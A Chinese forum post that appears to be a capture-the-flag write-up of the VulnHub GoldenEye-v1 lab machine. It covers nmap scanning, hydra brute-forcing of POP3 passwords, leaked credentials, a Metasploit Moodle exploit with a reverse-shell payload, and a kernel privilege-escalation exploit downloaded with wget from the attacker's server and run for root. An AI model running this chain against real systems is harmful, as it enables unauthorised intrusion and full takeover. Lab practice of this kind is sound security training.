找回密码
 立即注册
首页 业界区 业界 vulnhub靶机:GoldenEye-v1

vulnhub靶机:GoldenEye-v1

伏滢 2025-9-20 19:29:42
扫描挖掘本地的IP地址信息:
nmap -sT  192.168.111.101
1.png

发现开放了25,80端口
访问http://192.168.111.101:80
2.png

提示可以访问/sev-home/ ,访问后让我们输入账号密码,查看页面原代码 访问/terminal.js
3.png

提示账号Boris,Natalya和密码,将密码进行解码,登录/sev-home/
4.png

得到提示:is very effective, we have configured our pop3 service to run on a very high non-default port
使用nmap探测端口
nmap -p- 192.168.111.101 -T4
5.png

nmap -sS -sV -T4 -A -p55006,55007 192.168.111.101
6.png

这段信息看出这两个端口开放了pop3的mail服务的,通过/terminal.js页面,在注释中发现一条内容,指出目标系统正在使用默认密码。
我们已知账号,通过hydra爆破,账号为Boris,Natalya,写在uname.txt文件夹
hydra -L uname.txt -P /usr/share/wordlists/fasttrack.txt -s 192.168.111.101:55007 pop3
7.png

用户:boris 密码:secret1!
用户:natalya 密码:bird
通过NC登录pop3查看邮件信封内容枚举:
8.png

查看前三个邮件
9.png

10.png

11.png

第二封来自用户“natalya”,称她可以破坏鲍里斯的密码。
第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送,并保留在根目录中。但我们无法从此处阅读附件。
继续登录natalva账号查看邮件
12.png

13.png

两封邮件:第一封邮件:
娜塔莉亚,请你停止破解鲍里斯的密码。 此外,您是 GNO 培训主管。 一旦学生被指定给你,我就会给你发电子邮件。
此外,请注意可能的网络漏洞。 我们获悉,一个名为 Janus 的犯罪集团正在追捕 GoldenEye。
第二封邮件:
好的 Natalyn 我有一个新学生给你。 由于这是一个新系统,如果您看到任何配置问题,请告诉我或鲍里斯,尤其是它与安全有关的问题……即使不是,也只需以“安全”为幌子输入……它就会 轻松升级变更单
好的,用户信用是:
用户名:xenia
密码:RCP90rulez!
鲍里斯验证了她是一个有效的承包商,所以只需创建帐户好吗?
如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请务必编辑您的主机文件,因为您通常在远程离线工作....
由于您是 Linux 用户,因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。
我们来设置本地hosts文件
nano /etc/hosts
14.png

进行修改
访问severnaya-station.com/gnocertdir地址:
15.png

点击:Intro to GoldenEye可以进行登录,使用natalya邮箱第二封邮件获得的用户名密码登录:
16.png

登录成功!
Home / ▶ My profile / ▶ Messages --->发现有一封邮件,内容发现用户名doak
17.png

爆破用户名doak的邮件
hydra -L uname.txt -P /usr/share/wordlists/fasttrack.txt 192.168.111.101 -s 55007 pop3
18.png

得到密码,继续使用nc登录pop3,访问邮件,得到信息:
19.png

邮件消息说,为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名:dr_doak
密码:4England!
使用新账号登录cms:
20.png

登录成功,在:Home / ▶ My home 右边发现: s3cret.txt 另外发现这是Moodle使用的2.2.3版本
21.png

22.png

访问severnaya-station.com/dir007key/for-007.jpg
23.png

下载到本地:
wget http://severnaya-station.com/dir007key/for-007.jpg
24.png

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:
binwalk(路由逆向分析工具)
exiftool(图虫)
strings(识别动态库版本指令)
等查看jpg文件底层内容!
25.png

base64解码
26.png

线索中说,这是管理员的密码,通过admin账号登录cms
27.png

登录成功,可以搜索此版本的漏洞,我使用rce进行利用
使用msf
28.png

msfconsole                        ---进入MSF框架攻击界面
search moodle                     ---查找 moodle类型 攻击的模块
use 1                             ---调用0  exploit/multi/http/moodle_cmd_exec调用攻击脚本
set username admin                ---设置用户名:admin
set password xWinter1995x!        ---设置密码:xWinter1995x!
set rhost severnaya-station.com   ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir         ---设置目录: /gnocertdir
set payload cmd/unix/reverse      ---设置payload:cmd/unix/reverse
set lhost 192.168.4.231           ---设置:lhost 192.168.4.231(需要本地IP)
exploit  ----执行命令
成功拿下shell
29.png

进行内核提权:
uname -a
30.png

searchsploit 3.13
31.png

cp /usr/share/exploitdb/exploits/linux/local/37292.c 1.c
32.png

无法进行GCC编译,需要改下脚本为cc
gedit 1.c / nano 1.c      ---文本打开
第143行将gcc改为cc    ---编写下
然后在本目录下开启服务器:
python -m http.server 8081
反弹shell中执行wget http://192.168.111.25/1.c
33.png

cc 1.c shell
34.png

chmod 777 shell
./shell
whoami
cd /root
35.png

打完收工
36.png


来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

相关推荐

您需要登录后才可以回帖 登录 | 立即注册